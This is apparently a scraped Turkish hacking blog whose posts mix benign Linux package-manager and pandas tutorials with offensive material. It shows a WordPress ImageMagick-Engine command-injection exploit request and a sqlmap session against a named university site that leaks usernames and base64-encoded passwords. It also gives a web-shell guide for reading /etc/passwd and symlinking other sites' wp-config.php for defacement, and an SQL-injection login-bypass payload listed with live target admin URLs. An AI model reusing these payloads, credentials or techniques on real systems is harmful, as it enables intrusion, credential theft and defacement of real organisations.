dr4cula
#imhatimi
today | : | at : | safemode : ON
> / home / dr4cula / public_html /
name author perms com modified label

Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated) dr4cula rwxr-xr-x 0 07:40


Filename Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
Permission rw-r--r--
Author dr4cula
Date and Time 07:40
Label
Action

# Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)

# Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/"

# Date: Thursday, September 1, 2022

# Exploit Author: ABDO10

# Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/

# Software Link: https://github.com/orangelabweb/imagemagick-engine/

# Version: <= 1.7.4

# Tested on: windows 10


-- vulnerable section

https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529


-- payload on windows: d&calc.exe&anything

-- on unix : notify-send "done"

-- exploit :


GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload]

HTTP/1.1

Host: localhost

Cookie: wordpress_sec_xx=; wp-settings-time-1=;

wordpress_test_cookie=; wordpress_logged_in_xx=somestuff

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0)

Gecko/20100101 Firefox/104.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine

X-Requested-With: XMLHttpRequest

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

Te: trailers

Connection: close

            

Kali Linux from Browser (Kali Linux Online) dr4cula rwxr-xr-x 0 07:23


Filename Kali Linux from Browser (Kali Linux Online)
Permission rw-r--r--
Author dr4cula
Date and Time 07:23
Label
Action

Bilgisayarınıza Kali Linux kurmanıza gerek kalmadan online olarak browser üzerinden erişim sağlayabilirsiniz. Yapmanı gereken aşağıda verdiğim link üzerinden RUN ONLINE yazısına tıklamak sonra karşınızda Kali Linux. İyi kullanımlar dilerim. 

https://www.onworks.net/os-distributions/debian-based/free-kali-linux-online

Linux Paket Komutları (dpkg, apt, rpm, yum, urpmi) dr4cula rwxr-xr-x 0 13:19


Filename Linux Paket Komutları (dpkg, apt, rpm, yum, urpmi)
Permission rw-r--r--
Author dr4cula
Date and Time 13:19
Label
Action

Dpkg

dpkg komutu: Bu komut Debian dağıtımına ait bir program veya paket yükleyici komutudur. Bu komut diğer kurulum komutlarına göre daha kolay olarak görülür. Bu komut ile Debian paketlerini yükleyebilir, kaldırabilir,güncelleyebilir ve konfigüre edebiliriz.

Bu komutların kullanım şekilleri aşağıdaki gibidir.

Belirtilen işlemlerin gerçekleştirilebilmesi için en yüksek erişim hakkına sahip olmak gerekiyor yani ROOT olmak lazım. Bunun için önceki yazılarımda da belirttiğim gibi sudo komutu kullanılır.


Paket Kurma Komutu


$ dpkg -i   PaketDosyası.deb


Paketleri Kullanarak Sistemimizi Güncelleme Komutu


$ dpkg -i   PaketDosyası.deb


Sistemdeki Paketleri Kaldırma Komutu


$ dpkg -r   PaketAdı


Sistemdeki Var olan Paketleri Listeleme Komutu


$ dpkg -l


Sistemdeki Paketin içinde Var olan Bir Dosyayı Silme Komutu


$ dpkg -L    PaketAdı


Henüz Kurulmamış Bir Paketin içindeki Dosyaları Listeleme Komutu


$ dpkg -c    PaketDosyası.dep


Kurulu Paket hakkındaki Bilgileri Gösterme Komutu


$ dpkg -p    PaketAdı


Henüz Kurulmamış bir Paketin bilgilerini kurulumdan Önce Listeleme Komutu


$ dpkg -l      paket_dosyası.dep


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


RPM

rpm komutu: Bu komut linux dağıtımlarından çok popüler olan Redhat dağıtımının bir kurulum komutudur. Açılımı ise Redhat Package Manager dir. Bu komutu kullanarak Redhat paketlerini yüklemek oldukça kolaydır. Rpm komutunun kullanımı dpkg komutunun kullanımına çok benzemektedir. rpm komutunun kullanımı için yine ROOT kullanıcısı olmak gerekiyor.

Bu komutun genel kullanım şekilleri aşağıdaki gibidir.


Paket Kurma Komutu


$ rpm  -i   PaketDosyası.rpm


Paketleri Kullanarak Sistemimizi Güncelleme Komutu


$ rpm  -U   PaketDosyası.rpm


Sistemdeki Paketleri Kaldırma Komutu


$ rpm  -e     PaketAdı


Sistemdeki Var olan Paketleri Listeleme Komutu


$ rpm  -qa


Sistemdeki Paketin içinde Var olan Bir Dosyayı Silme Komutu


$ rpm   -ql    PaketAdı


Henüz Kurulmamış Bir Paketin içindeki Dosyaları Listeleme Komutu


$ rpm    -qpl     PaketDosyası.rpm


Kurulu Paket hakkındaki Bilgileri Gösterme Komutu


$ rpm   -qi     PaketAdı


Henüz Kurulmamış bir Paketin bilgilerini kurulumdan Önce Listeleme Komutu


$ rpm   -qpi     PaketDosyası.rpm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Yum

yum komutu: Bu komut tıpkı rpm komutu gibi Redhat dağıtımının oluşturduğu paketleri kurmaya, kaldırmaya, güncelleştirmeye,konfigüre etmeye yarayan bir kurulum komutudur. Bu komut Redhat dağıtımındaki paketlere uygun olduğu gibi Fedora linux paketleri içinde aynı işlevleri görür. Yum komutunun açılımı Yellowdog updater modified şeklindedir.

yum komutunun paketler üzerindeki işlevleri aşağıdaki gibidir.


1.Paket Kurulumu için Gereken Komut


$  yum     install   PaketAdı


2.Var olan Paketi Kaldırmak için Gereken Komut


$  yum    remove     PaketAdı


3.Var olan Bir Paketi Güncelleştirmek için Gereken Komut


$  yum    update     PaketAdı


4.Kurmak istediğiniz Paketi Bilmediğiniz Durumda Gereken Komut


$  yum    search     AramaTerimi


Bu komut ile AramaTerimi nde yazdığınız kelime ile özdeşleşen tüm paketler listelenir.


5.Hakkında çok şey Bilmediğiniz Paket için ayrıntılı Bilgi Alma Komutu


$  yum    info   PaketAdı


6. Yum Veritabanında ki TümPaketleri Görmek için gereken Komut


$  yum   list  |  less


7.Sisteminizde Kurulu Olan Tüm yum paketlerini listelemek için Gereken Komut


$  yum    list     installed  |  less


8.Birbiriyle İlişkili Olan yum Paketlerini görmek için gereken Komut


$   yum    grouplist


9.Kurulu yum paketlerinin gittiği Depoları listelemek için Gereken Komut


$   yum   repolist   all


10.Güncelleştirme gerektiren paketleri Listelemek için gereken Komut


$  yum   list   updates


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


urpmi  komutu: Bu komut linux dağıtımlarından Mandriva dağıtımına ait bir paket kurulum,güncelleştirme ve kaldırma komutudur. Bu komutu kullanmanız için sudo komutuyla ROOT kullanıcısı olmanız lazım.

urpmi komutunu kullanarak paketler için yapılan işlemler ve komutları aşağıdaki gibidir.


1.Paket Kurmak için kullanılan komut


$  urpmi   PaketAdı


2.Sistemdeki Bir Paketi Kaldırmak için kullanılan Komut


$  urpme PaketAdı


3.Bir Paketi Güncelleştirmek için Gereken Komut


$    urpmi.update PaketAdı


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

apt-get

apt-get komutu: Bu komut Linux dağıtımlarından Debian a ait olan Paket yönetim komutudur. Bu komut ayrıca Ubuntu dağıtımında da çokça kullanılan bir komutdur. Bu komutun açılımı Advanced package tool (Gelişmiş paket aracı) şeklindedir.


Bu komutun paketler üzerinde yaptığı işlemler aşağıdaki gibidir.


1.Paket Yüklemek için Gereken Komut


$    apt-get   install   PaketAdı


2.Sistemdeki Bir Paketi Kaldırmak için Gereken Komut


$    apt-get   remove   PaketAdı


3.Sistemdeki Bir Paketi Konfigürasyon Dosyalarıyla beraber Kaldırmak için Gereken Komut


$    apt-get   –purge   remove   PaketAdı


4.Sistemdeki Bir paketin Bir üst Sürüme Yükseltmek için gereken Komut


$    apt-get   upgrade   PaketAdı


5.Sistemdeki Tüm Paketleri Güncelleştirmek için Gereken Komut


$    apt-get   update   sudo      // Bu paket ile Paket indisleri ROOT olarak güncelleştirilir.


$    apt-get  -u    upgrade        // Paketleri analiz edecek ve gerekli güncelleştirmeleri indirip yükleyecektir.

Bazi Paylasilmis SQL Datalari dr4cula rwxr-xr-x 0 23:55


Filename Bazi Paylasilmis SQL Datalari
Permission rw-r--r--
Author dr4cula
Date and Time 23:55
Label
Action
http://alhikmah.edu.ng/staff_dir/
http://alhikmah.edu.ng/staff_dir/admin/
Direk Sqlmap'ten cektim loglari artik gerisi sizde kolay gelsin :)


sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
available databases [2]:
[*] alhikmah_staffdir
[*] information_schema

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
[8 tables]
+------------------+
| course_detail    |
| departments      |
| faculties        |
| lecturer_profile |
| programs         |
| title_tb         |
| userinfo         |
| userlogin        |
+------------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
[8 tables]
+------------------+
| course_detail    |
| departments      |
| faculties        |
| lecturer_profile |
| programs         |
| title_tb         |
| userinfo         |
| userlogin        |
+------------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
Table: userlogin
[6 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| eMail    | varchar(250) |
| id       | int(11)      |
| password | blob         |
| status   | varchar(30)  |
| type     | varchar(250) |
| userName | varchar(250) |
+----------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- vojZ

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
Table: userlogin
[4 entries]
+-------------+------------------+
| userName    | password         |
+-------------+------------------+
| admin2018   | d2lzZG9tOTlAQA== |
| odeyale2017 | b2RleWFsZTIwMTc= |
| abdul2018   | d2lzZG9tOTlAQA== |
| sdfdsfsd    | ZmRzZmRz         |
+-------------+------------------+

Cyberfox Browser + HackBar + Kullandigim Addonslar dr4cula rwxr-xr-x 1 02:43


Filename Cyberfox Browser + HackBar + Kullandigim Addonslar
Permission rw-r--r--
Author dr4cula
Date and Time 02:43
Label
Action
Merhabalar arkadaslar sizler icin internette ararken zorlandiginiz, bulmaniz halinde viruslu olarak bulacaginiz, hatta hackbar diyip icine https exploit yerlestiren lamerlerin sorun cikaracagi surumlere ulasabilirsiniz ancak sizin icin ozel olarak derledim;

Oncelikle Cyberfox`u https://sourceforge.net/projects/cyberfox/ bu adresten indiriniz. 

Hackbar ve addonlarim icin : https://gofile.io/?c=3nnynH

Iyi eglenceler ## 

Python ile Data Analizi Yapma dr4cula rwxr-xr-x 0 12:38


Filename Python ile Data Analizi Yapma
Permission rw-r--r--
Author dr4cula
Date and Time 12:38
Label
Action
Kodlar ve veriler tamamen bana aittir. Özgün bir içeriktir. Bir benzerini internette bulabileceğinizi sanmıyorum.
Öncelikle Anaconda ile çalışmaktayım. Eğer null olarak python kullanıyorsanız belli kütüphaneleri indirmeniz gerekmektedir;
- Numpy
- Pandas
-Mathplotlib
-SeaBorn

Şimdi datamı sizinle paylaşacağım ve bu data üzerinden analiz yapacağız. Aslında bu temel birazda sql mantığının pyhton üzerindeki yeridir.
Data Dosyası indirdikten sonra aynı klasör üzerinde Jupyter Notebook ile devam edeceğiz.


Code:
import numpy as np #Kütüphaneleri çağırıp kısaltmaları veriyoruz
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns

yolcu_df = pd.read_csv("titanic.csv") #Datamızı okuma komudu ekliyoruz. Bundan sonra yolcu_df değeri sürekli data okuyacaktır.

yolcu_df.info() #Data hakkında bilgi

yolcu_df.describe() #Tablonun İstatistik Bilgisi

yolcu_df=yolcu_df.drop(['PassengerID','Name','SexCode'],axis=1) #Yolcunun Adı, SexCodu, ID si çıkarıldı. 'drop' fonksiyonu ile

yolcu_df.head() #Çıkarıldıktan Sonra İlk 5 Satır Görüntülendi

erkek_yolcu = yolcu_df[yolcu_df['Sex']== 'male']  #Erkek_yolcu değeri atandı
kadın_yolcu = yolcu_df[yolcu_df['Sex']== 'female'] #Kadın_yolcu değeri atandı

cocuk_yolcu = yolcu_df[yolcu_df['Age'] < 16] #Çocuk_yolcu Değeri Atandı
erkek_cocuk_yolcu = cocuk_yolcu[cocuk_yolcu['Sex'] == 'male'] #Erkek_Çocuk_Yolcu Değeri Atandı
kadın_cocuk_yolcu = cocuk_yolcu[cocuk_yolcu['Sex'] == 'female'] #Kadın_Çocuk_Yolcu Değeri atandı

yetiskin_erkek_yolcu = erkek_yolcu.drop(erkek_cocuk_yolcu.index[:]) # Yetişkin erkek yolcu öğrenilsin diye çocuk erkek yolcular çıkarıldı.
yetiskin_kadın_yolcu = kadın_yolcu.drop(kadın_cocuk_yolcu.index[:]) # Yetişkin erkek yolcu öğrenilsin diye çocuk erkek yolcular çıkarıldı.

x = [len(erkek_yolcu), len(kadın_yolcu)] #İlk tablo
label = ['Male', 'Female']
plt.pie(x, labels = label, autopct = '%1.01f%%')
plt.title('Yolcuların Cinsiyet Grafiği')
plt.show()

def yas_problemi(x): # Bu fonksiyonda cocuk genç yetişkin olarak sınıflandırma yapıldı
    if x>=0 and x <16:
        return 'Cocuk'
    elif x>=16 and x<=24:
        return 'Genc'
    else:
        return 'Yetiskin'
        
yolcu_df['Age'].apply(yas_problemi).value_counts() # Burada Tam Anlamıyla Yaş Aralıkları Belli Olmuştur

yolcu_df['Age'].apply(yas_problemi).value_counts().plot(kind='pie', autopct='%1.0f%%') # Belli olan yaş grafiği ile grafik olarak çıktı alıyoruz
plt.title('Yolcuların Yas Ortalaması')
plt.show()

print ('Yetişkin erkek yolcuların yaş ortalaması:', yetiskin_erkek_yolcu['Age'].mean()) #Yaş Ortalaması Alınmıştır
print ('Yetişkin kadın yolcuların yaş ortalaması:', yetiskin_kadin_yolcu['Age'].mean())
print ('Çocuk yolcuların yaş ortalaması:', cocuk_yolcu['Age'].mean())

yolcu_df['PClass'].value_counts() #Yolcuların Hangi Sınıflardan Oluştuğu görüntülenmiştir.

yolcu_df['PClass'].value_counts().plot(kind='barh', color='green', figsize=[16,4]) #Yolcuların Hangi Sınıflardan Oluştuğunun Grafik Çıktısıdır.
plt.xlabel('Sıklık')
plt.ylabel('Yolcu sınıfı')
plt.show()

yolcu_df['Survived'].value_counts() # Yaşayan ve ölen yolcuların sayısı

yolcu_df['Survived'].value_counts().plot(kind='bar', title='Hayatta Kalma') # Yaşayan ve ölen yolcuların grafik çıktısı
plt.xlabel('0= Ölü  1= Hayatta')
plt.ylabel('Sıklık')
plt.show()

yolcu_df.groupby('Sex')['Survived'].value_counts() # Yaşayan ve ölen yolcuların cinsiyetine göre değerleri

yolcu_df.groupby('Sex')['Survived'].value_counts().plot(kind='bar', stacked=True, colormap='winter') # Yaşayan ve ölen yolcuların cinsiyetine göre değerleri grafik çıktısı
plt.show()

cinsiyet_hayattakalma = yolcu_df.groupby(['Sex', 'Survived']) # Yaşayan ve ölen yolcuların cinsiyetine göre değerleri grafik çıktısı farklı version
cinsiyet_hayattakalma.size().unstack().plot(kind='bar', stacked=True, colormap='winter')
plt.ylabel('Sıklık')
plt.title('Cinsiyete Göre Hayatta Kalma')
plt.show()

print ('Hayatta kalan yetiskin kadın yolcular:', yetiskin_kadin_yolcu['Survived'].mean())
print ('Hayatta kalan yetiskin erkek yolcular:', yetiskin_erkek_yolcu['Survived'].mean())

sınıf_hayattakalma = yolcu_df.groupby(['PClass', 'Survived'])

sınıf_hayattakalma.size()

sınıf_hayattakalma.size().unstack()

sınıf_hayattakalma.size().unstack().plot(kind='bar', stacked=True, colormap='autumn')
plt.xlabel('1st = Üst Seviye,   2nd = Orta Seviye,   3rd = Düşük Seviye')
plt.ylabel('Sıklık')
plt.title('Ölen veya Yasayan Yolcuların Sınıfları')
plt.show()
Python ile sormak istediğiniz başka konular var ise post altına yazarsanız sevinirim.

Bunun Dark tarafı yani ben Kekır olacam oradan bir kaç tüyo ver dersen;

1- Uzaktan veri almana yardımcı olur ancak benim yaptığım kodlama tamamen alınmış veriler üzerinden hazır db ancak link üzerinden de aynı şekilde çekebilirsin.
2- Alınan data üzerinde çok rahat oynamalar yapılır. Örneğin shell attınız bir servera (Linux) oradan gene rahatça oynamalar yapılır. Bypass mantığı işler. Denenmiştir çok tehlikelidir 😂🤣
3- Bunlar temeldir priv olarak veremediğim çok şey var ancak basit mantığı anlayıp oradan geliştirebilirsiniz kendinizi.
4- Çok konuştum ve susuyorum.

CgiTelnet Kullanimi dr4cula rwxr-xr-x 0 03:25


Filename CgiTelnet Kullanimi
Permission rw-r--r--
Author dr4cula
Date and Time 03:25
Label
Action
Oncelikle merhabalar arkadaslar. Halen deliler gibi bypass yapabilen tek tools olan cgi telneti aciklayacagim arkadaslar. Kolay yonu ve serverda cok rahat hareket etmenize saglayan, fazla yer tutmayan bir yazilim. Kim kodladiysa elleri kor oldu.

Oncelikle Cgi Telnet calisma mantigini anlatayim.
/usr/bin/perl komuduyla baslar. Serverda bulunan isletim sisteminden perl komudunu ceker. Bu cogu komut serverda hata almanizi saglayabilir. Ancak #!/usr/bin/perl -I/usr/local/bandmain komuduyla bandmainden alacagindan etkilenmeyecektir. Ya perl'den eger calismaz ise bandmainden alacaktir. Serverda cgitelnet dosyasina chmod 755 vermeyi unutmayin ve hatasiz sekilde suanda calistirmis olduk.

Eger gene calismaz ise su metotlari uygulayin.

.htaccess dosyasi olusturun ve icine sunlari yaziniz.
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .m4
AddHandler cgi-script .m4
AddHandler cgi-script .m4


bizim yaptigimiz islem suanda .pl dosyasini .m4 dosyasina cevirdik yani bununla itibaren cgitelnet.pl dosyasi cgitelnet.m4 olarak degismis olacaktir. http://hedefsite.com/cgitelnet.m4 yazilsa yeterlidir.

Simdi girelim olaylarimiza.

Simdi arkadaslar oncelikle blogumuzun uzerinde cgitelnet kodlarinin hepsi var.
Ancak basic olarak su sekilde anlatmam lazim serverdaki configi nasil okuruz onu anlatacagim.

cat /etc/passwd komudu serverdaki kullanici adlarini sergiler.
cat /etc/named.conf | grep zone komuduylada domain isimleri sergilenir.
Artik gerisi scriptine gore config cekmekte kaliyor.

Ornegin x.com sitesine cgitelneti soktuk. Ancak biz y.com sitesindeki configi okumak istiyoruz. Kullanici adini cat /etc/passwd komuduyla alinca gerisi dahada kolaylasiyor. Ornegin kullanici adimizda dr4cula olsun. Sitede Wordpress olsun. Config yolu wp-config.php dir.

ln -s /home/dr4cula/public_html/wp-config.php 1.txt olarak config bilgilerini 1.txt dosyasina cekmis bulunduk. Simdi x.com/1.txt dosyasina girip config bilgilerini elde edip MySQL ile baglanip kullanici ve passwordu bulabilir degistirebilir o siteyide deface listesine atabilirsiniz.

Basic anlatimla elimden geldigince anlatmis oldum. Yakinda daha ileri seviye yapilacaklari sizlerle paylasacagim.

Kolay Gelsin.
 

Gizli Numara Bulma dr4cula rwxr-xr-x 0 05:41


Filename Gizli Numara Bulma
Permission rw-r--r--
Author dr4cula
Date and Time 05:41
Label
Action
Merhabalar arkadaslar. Gizli numaradan arayan arkadasi cok rahat birsekilde numarasina ulasabiliyoruz.

https://www.turktelekom.com.tr/Sayfalar/Ana-Sayfa.aspx adresine gidelim öncelikle

Online işlemlerden mobili seçin.

Sonra numaranızı yazıp şifrenizle giriş yapın.

[​IMG]

Ardından lira işlemlerim diyin ve ordan
Harcama detayından > Tümünü seçin

[​IMG]

ve belirlediğiniz tarihler arası sizi kimin aradığı herşey gözüküyor.

Iyi eglenceler.

CMS Hacking SQL Vulnerabilities dr4cula rwxr-xr-x 0 04:00


Filename CMS Hacking SQL Vulnerabilities
Permission rw-r--r--
Author dr4cula
Date and Time 04:00
Label
Action
Başlangıç seviyesindeki arkadaşlar için önerebileceğim türden bir açıktır.
Admin panelinde ilk kullanıcıyı çağırarak admin login olmuş oluyorsunuz.
Sitenin admin paneline ulaştıktan sonra tamamen gerisi size ait olmuş oluyor.
Kolay gelsin.

Google dork : intext:"Desenvolvido por 3webs"

Username : '=' 'or'
Password : '=' 'or'

Demo : 

http://andreapinheiro.arq.br/admin/
http://celiapaisagista.com.br/admin/
http://elevartecelevadores.com.br/admin/
http://reno1000.com.br/admin/
http://contrem.com/admin/
http://frikotesjoias.com/admin/
http://idepsocial.org.br/admin/
http://dtsdistribuidora.com.br/admin/

Havij 1.6 [Non-Virus] & Cracked ! dr4cula rwxr-xr-x 0 13:36


Filename Havij 1.6 [Non-Virus] & Cracked !
Permission rw-r--r--
Author dr4cula
Date and Time 13:36
Label
Action
Piyasada bulunan Sql Inject Application lardan en guncel kullanilan ve arayuzu cok rahat olan bir programdir.

Cogu insan icine trojen gomdugunden virussuz olanini bulmak gercekten zordur.
Genede indirdikten sonra virus scan ediniz. Hack Tools olarak gozukecektir.